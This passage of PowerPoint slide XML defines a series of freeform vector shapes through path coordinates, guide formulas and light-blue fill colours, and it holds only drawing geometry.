                      <a:pt x="10" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10708" name="Freeform 115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1270" y="2579"/>
                <a:ext cx="12" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 12"/>
                  <a:gd name="T1" fmla="*/ 1 h 56"/>
                  <a:gd name="T2" fmla="*/ 3 w 12"/>
                  <a:gd name="T3" fmla="*/ 1 h 56"/>
                  <a:gd name="T4" fmla="*/ 3 w 12"/>
                  <a:gd name="T5" fmla="*/ 5 h 56"/>
                  <a:gd name="T6" fmla="*/ 2 w 12"/>
                  <a:gd name="T7" fmla="*/ 11 h 56"/>
                  <a:gd name="T8" fmla="*/ 0 w 12"/>
                  <a:gd name="T9" fmla="*/ 17 h 56"/>
                  <a:gd name="T10" fmla="*/ 0 w 12"/>
                  <a:gd name="T11" fmla="*/ 25 h 56"/>
                  <a:gd name="T12" fmla="*/ 0 w 12"/>
                  <a:gd name="T13" fmla="*/ 35 h 56"/>
                  <a:gd name="T14" fmla="*/ 2 w 12"/>
                  <a:gd name="T15" fmla="*/ 46 h 56"/>
                  <a:gd name="T16" fmla="*/ 3 w 12"/>
                  <a:gd name="T17" fmla="*/ 56 h 56"/>
                  <a:gd name="T18" fmla="*/ 11 w 12"/>
                  <a:gd name="T19" fmla="*/ 56 h 56"/>
                  <a:gd name="T20" fmla="*/ 11 w 12"/>
                  <a:gd name="T21" fmla="*/ 55 h 56"/>
                  <a:gd name="T22" fmla="*/ 10 w 12"/>
                  <a:gd name="T23" fmla="*/ 50 h 56"/>
                  <a:gd name="T24" fmla="*/ 10 w 12"/>
                  <a:gd name="T25" fmla="*/ 43 h 56"/>
                  <a:gd name="T26" fmla="*/ 9 w 12"/>
                  <a:gd name="T27" fmla="*/ 35 h 56"/>
                  <a:gd name="T28" fmla="*/ 7 w 12"/>
                  <a:gd name="T29" fmla="*/ 26 h 56"/>
                  <a:gd name="T30" fmla="*/ 9 w 12"/>
                  <a:gd name="T31" fmla="*/ 17 h 56"/>
                  <a:gd name="T32" fmla="*/ 10 w 12"/>
                  <a:gd name="T33" fmla="*/ 7 h 56"/>
                  <a:gd name="T34" fmla="*/ 12 w 12"/>
                  <a:gd name="T35" fmla="*/ 0 h 56"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 0 h 56"/>
                  <a:gd name="T38" fmla="*/ 12 w 12"/>
                  <a:gd name="T39" fmla="*/ 0 h 56"/>
                  <a:gd name="T40" fmla="*/ 12 w 12"/>
                  <a:gd name="T41" fmla="*/ 0 h 56"/>
                  <a:gd name="T42" fmla="*/ 11 w 12"/>
                  <a:gd name="T43" fmla="*/ 0 h 56"/>
                  <a:gd name="T44" fmla="*/ 10 w 12"/>
                  <a:gd name="T45" fmla="*/ 0 h 56"/>
                  <a:gd name="T46" fmla="*/ 9 w 12"/>
                  <a:gd name="T47" fmla="*/ 0 h 56"/>
                  <a:gd name="T48" fmla="*/ 6 w 12"/>
                  <a:gd name="T49" fmla="*/ 0 h 56"/>
                  <a:gd name="T50" fmla="*/ 4 w 12"/>
                  <a:gd name="T51" fmla="*/ 1 h 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
                  <a:gd name="T79" fmla="*/ 0 h 56"/>
                  <a:gd name="T80" fmla="*/ 12 w 12"/>
                  <a:gd name="T81" fmla="*/ 56 h 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 h="56">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10709" name="Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1270" y="2584"/>
                <a:ext cx="10" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 10"/>
                  <a:gd name="T1" fmla="*/ 1 h 45"/>
                  <a:gd name="T2" fmla="*/ 3 w 10"/>
                  <a:gd name="T3" fmla="*/ 2 h 45"/>
                  <a:gd name="T4" fmla="*/ 3 w 10"/>
                  <a:gd name="T5" fmla="*/ 5 h 45"/>
                  <a:gd name="T6" fmla="*/ 2 w 10"/>
                  <a:gd name="T7" fmla="*/ 8 h 45"/>
                  <a:gd name="T8" fmla="*/ 2 w 10"/>
                  <a:gd name="T9" fmla="*/ 14 h 45"/>
                  <a:gd name="T10" fmla="*/ 0 w 10"/>
                  <a:gd name="T11" fmla="*/ 21 h 45"/>
                  <a:gd name="T12" fmla="*/ 0 w 10"/>
                  <a:gd name="T13" fmla="*/ 28 h 45"/>
                  <a:gd name="T14" fmla="*/ 2 w 10"/>
                  <a:gd name="T15" fmla="*/ 36 h 45"/>
                  <a:gd name="T16" fmla="*/ 3 w 10"/>
                  <a:gd name="T17" fmla="*/ 45 h 45"/>
                  <a:gd name="T18" fmla="*/ 10 w 10"/>
                  <a:gd name="T19" fmla="*/ 45 h 45"/>
                  <a:gd name="T20" fmla="*/ 10 w 10"/>
                  <a:gd name="T21" fmla="*/ 43 h 45"/>
                  <a:gd name="T22" fmla="*/ 9 w 10"/>
                  <a:gd name="T23" fmla="*/ 40 h 45"/>
                  <a:gd name="T24" fmla="*/ 7 w 10"/>
                  <a:gd name="T25" fmla="*/ 35 h 45"/>
                  <a:gd name="T26" fmla="*/ 7 w 10"/>
                  <a:gd name="T27" fmla="*/ 28 h 45"/>
                  <a:gd name="T28" fmla="*/ 6 w 10"/>
                  <a:gd name="T29" fmla="*/ 21 h 45"/>
                  <a:gd name="T30" fmla="*/ 7 w 10"/>
                  <a:gd name="T31" fmla="*/ 14 h 45"/>
                  <a:gd name="T32" fmla="*/ 7 w 10"/>
                  <a:gd name="T33" fmla="*/ 7 h 45"/>
                  <a:gd name="T34" fmla="*/ 10 w 10"/>
                  <a:gd name="T35" fmla="*/ 1 h 45"/>
                  <a:gd name="T36" fmla="*/ 10 w 10"/>
                  <a:gd name="T37" fmla="*/ 1 h 45"/>
                  <a:gd name="T38" fmla="*/ 10 w 10"/>
                  <a:gd name="T39" fmla="*/ 1 h 45"/>
                  <a:gd name="T40" fmla="*/ 10 w 10"/>
                  <a:gd name="T41" fmla="*/ 0 h 45"/>
                  <a:gd name="T42" fmla="*/ 10 w 10"/>
                  <a:gd name="T43" fmla="*/ 0 h 45"/>
                  <a:gd name="T44" fmla="*/ 9 w 10"/>
                  <a:gd name="T45" fmla="*/ 0 h 45"/>
                  <a:gd name="T46" fmla="*/ 7 w 10"/>
                  <a:gd name="T47" fmla="*/ 0 h 45"/>
                  <a:gd name="T48" fmla="*/ 6 w 10"/>
                  <a:gd name="T49" fmla="*/ 1 h 45"/>
                  <a:gd name="T50" fmla="*/ 4 w 10"/>
                  <a:gd name="T51" fmla="*/ 1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
                  <a:gd name="T79" fmla="*/ 0 h 45"/>
                  <a:gd name="T80" fmla="*/ 10 w 10"/>
                  <a:gd name="T81" fmla="*/ 45 h 4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 h="45">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10710" name="Freeform 117"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1272" y="2590"/>
                <a:ext cx="7" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 7"/>
                  <a:gd name="T1" fmla="*/ 1 h 32"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 1 h 32"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 3 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 7"/>
                  <a:gd name="T7" fmla="*/ 6 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 7"/>
                  <a:gd name="T9" fmla="*/ 10 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 7"/>
                  <a:gd name="T11" fmla="*/ 15 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 7"/>
                  <a:gd name="T13" fmla="*/ 20 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 7"/>
                  <a:gd name="T15" fmla="*/ 27 h 32"/>
                  <a:gd name="T16" fmla="*/ 1 w 7"/>
                  <a:gd name="T17" fmla="*/ 32 h 32"/>
                  <a:gd name="T18" fmla="*/ 5 w 7"/>
                  <a:gd name="T19" fmla="*/ 32 h 32"/>
                  <a:gd name="T20" fmla="*/ 5 w 7"/>
                  <a:gd name="T21" fmla="*/ 31 h 32"/>
                  <a:gd name="T22" fmla="*/ 5 w 7"/>
                  <a:gd name="T23" fmla="*/ 29 h 32"/>
                  <a:gd name="T24" fmla="*/ 4 w 7"/>
                  <a:gd name="T25" fmla="*/ 25 h 32"/>
                  <a:gd name="T26" fmla="*/ 4 w 7"/>
                  <a:gd name="T27" fmla="*/ 20 h 32"/>
                  <a:gd name="T28" fmla="*/ 4 w 7"/>
                  <a:gd name="T29" fmla="*/ 15 h 32"/>
                  <a:gd name="T30" fmla="*/ 4 w 7"/>
                  <a:gd name="T31" fmla="*/ 9 h 32"/>
                  <a:gd name="T32" fmla="*/ 4 w 7"/>
                  <a:gd name="T33" fmla="*/ 4 h 32"/>
                  <a:gd name="T34" fmla="*/ 7 w 7"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 7 w 7"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 7 w 7"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 5 w 7"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 5 w 7"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 5 w 7"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 4 w 7"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 3 w 7"/>
                  <a:gd name="T49" fmla="*/ 0 h 32"/>
                  <a:gd name="T50" fmla="*/ 2 w 7"/>
                  <a:gd name="T51" fmla="*/ 1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32"/>
                  <a:gd name="T80" fmla="*/ 7 w 7"/>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32">
                    <a:moveTo>
                      <a:pt x="2" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10711" name="Freeform 118"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1367" y="2557"/>
                <a:ext cx="24" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 24"/>
                  <a:gd name="T1" fmla="*/ 1 h 90"/>
                  <a:gd name="T2" fmla="*/ 22 w 24"/>
                  <a:gd name="T3" fmla="*/ 1 h 90"/>
                  <a:gd name="T4" fmla="*/ 21 w 24"/>
                  <a:gd name="T5" fmla="*/ 3 h 90"/>
                  <a:gd name="T6" fmla="*/ 19 w 24"/>
                  <a:gd name="T7" fmla="*/ 8 h 90"/>
                  <a:gd name="T8" fmla="*/ 17 w 24"/>
                  <a:gd name="T9" fmla="*/ 16 h 90"/>
                  <a:gd name="T10" fmla="*/ 15 w 24"/>
                  <a:gd name="T11" fmla="*/ 28 h 90"/>
                  <a:gd name="T12" fmla="*/ 14 w 24"/>
                  <a:gd name="T13" fmla="*/ 43 h 90"/>
                  <a:gd name="T14" fmla="*/ 15 w 24"/>
                  <a:gd name="T15" fmla="*/ 64 h 90"/>
                  <a:gd name="T16" fmla="*/ 18 w 24"/>
                  <a:gd name="T17" fmla="*/ 90 h 90"/>
                  <a:gd name="T18" fmla="*/ 5 w 24"/>
                  <a:gd name="T19" fmla="*/ 90 h 90"/>
                  <a:gd name="T20" fmla="*/ 4 w 24"/>
                  <a:gd name="T21" fmla="*/ 88 h 90"/>
                  <a:gd name="T22" fmla="*/ 3 w 24"/>
                  <a:gd name="T23" fmla="*/ 81 h 90"/>
                  <a:gd name="T24" fmla="*/ 1 w 24"/>
                  <a:gd name="T25" fmla="*/ 69 h 90"/>
                  <a:gd name="T26" fmla="*/ 0 w 24"/>
                  <a:gd name="T27" fmla="*/ 56 h 90"/>
                  <a:gd name="T28" fmla="*/ 0 w 24"/>
                  <a:gd name="T29" fmla="*/ 41 h 90"/>
                  <a:gd name="T30" fmla="*/ 1 w 24"/>
                  <a:gd name="T31" fmla="*/ 27 h 90"/>
                  <a:gd name="T32" fmla="*/ 4 w 24"/>
                  <a:gd name="T33" fmla="*/ 13 h 90"/>
                  <a:gd name="T34" fmla="*/ 7 w 24"/>
                  <a:gd name="T35" fmla="*/ 0 h 90"/>
                  <a:gd name="T36" fmla="*/ 24 w 24"/>
                  <a:gd name="T37" fmla="*/ 1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90"/>
                  <a:gd name="T59" fmla="*/ 24 w 24"/>
                  <a:gd name="T60" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="24" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10712" name="Freeform 119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1368" y="2564"/>
                <a:ext cx="19" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 19"/>
                  <a:gd name="T1" fmla="*/ 0 h 76"/>
                  <a:gd name="T2" fmla="*/ 19 w 19"/>
                  <a:gd name="T3" fmla="*/ 0 h 76"/>
                  <a:gd name="T4" fmla="*/ 18 w 19"/>
                  <a:gd name="T5" fmla="*/ 2 h 76"/>
                  <a:gd name="T6" fmla="*/ 17 w 19"/>
                  <a:gd name="T7" fmla="*/ 7 h 76"/>
                  <a:gd name="T8" fmla="*/ 14 w 19"/>
                  <a:gd name="T9" fmla="*/ 13 h 76"/>
                  <a:gd name="T10" fmla="*/ 13 w 19"/>
                  <a:gd name="T11" fmla="*/ 22 h 76"/>
                  <a:gd name="T12" fmla="*/ 12 w 19"/>
                  <a:gd name="T13" fmla="*/ 36 h 76"/>
                  <a:gd name="T14" fmla="*/ 13 w 19"/>
                  <a:gd name="T15" fmla="*/ 54 h 76"/>
                  <a:gd name="T16" fmla="*/ 14 w 19"/>
                  <a:gd name="T17" fmla="*/ 76 h 76"/>
                  <a:gd name="T18" fmla="*/ 4 w 19"/>
                  <a:gd name="T19" fmla="*/ 76 h 76"/>
                  <a:gd name="T20" fmla="*/ 4 w 19"/>
                  <a:gd name="T21" fmla="*/ 74 h 76"/>
                  <a:gd name="T22" fmla="*/ 3 w 19"/>
                  <a:gd name="T23" fmla="*/ 68 h 76"/>
                  <a:gd name="T24" fmla="*/ 2 w 19"/>
                  <a:gd name="T25" fmla="*/ 58 h 76"/>
                  <a:gd name="T26" fmla="*/ 0 w 19"/>
                  <a:gd name="T27" fmla="*/ 47 h 76"/>
                  <a:gd name="T28" fmla="*/ 0 w 19"/>
                  <a:gd name="T29" fmla="*/ 35 h 76"/>
                  <a:gd name="T30" fmla="*/ 0 w 19"/>
                  <a:gd name="T31" fmla="*/ 22 h 76"/>
                  <a:gd name="T32" fmla="*/ 3 w 19"/>
                  <a:gd name="T33" fmla="*/ 9 h 76"/>
                  <a:gd name="T34" fmla="*/ 6 w 19"/>
                  <a:gd name="T35" fmla="*/ 0 h 76"/>
                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37" fmla="*/ 0 h 7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76"/>
                  <a:gd name="T59" fmla="*/ 19 w 19"/>
                  <a:gd name="T60" fmla="*/ 76 h 7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76">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10713" name="Freeform 120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1370" y="2570"/>
                <a:ext cx="15" cy="63"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 63"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 1 h 63"/>
                  <a:gd name="T4" fmla="*/ 14 w 15"/>
                  <a:gd name="T5" fmla="*/ 2 h 63"/>
                  <a:gd name="T6" fmla="*/ 12 w 15"/>
                  <a:gd name="T7" fmla="*/ 6 h 63"/>
                  <a:gd name="T8" fmla="*/ 11 w 15"/>
                  <a:gd name="T9" fmla="*/ 12 h 63"/>
                  <a:gd name="T10" fmla="*/ 10 w 15"/>
                  <a:gd name="T11" fmla="*/ 19 h 63"/>
                  <a:gd name="T12" fmla="*/ 9 w 15"/>
                  <a:gd name="T13" fmla="*/ 30 h 63"/>
                  <a:gd name="T14" fmla="*/ 10 w 15"/>
                  <a:gd name="T15" fmla="*/ 44 h 63"/>
                  <a:gd name="T16" fmla="*/ 11 w 15"/>
                  <a:gd name="T17" fmla="*/ 63 h 63"/>
                  <a:gd name="T18" fmla="*/ 2 w 15"/>
                  <a:gd name="T19" fmla="*/ 63 h 63"/>
                  <a:gd name="T20" fmla="*/ 2 w 15"/>
                  <a:gd name="T21" fmla="*/ 62 h 63"/>
                  <a:gd name="T22" fmla="*/ 1 w 15"/>
                  <a:gd name="T23" fmla="*/ 56 h 63"/>
                  <a:gd name="T24" fmla="*/ 0 w 15"/>
                  <a:gd name="T25" fmla="*/ 49 h 63"/>
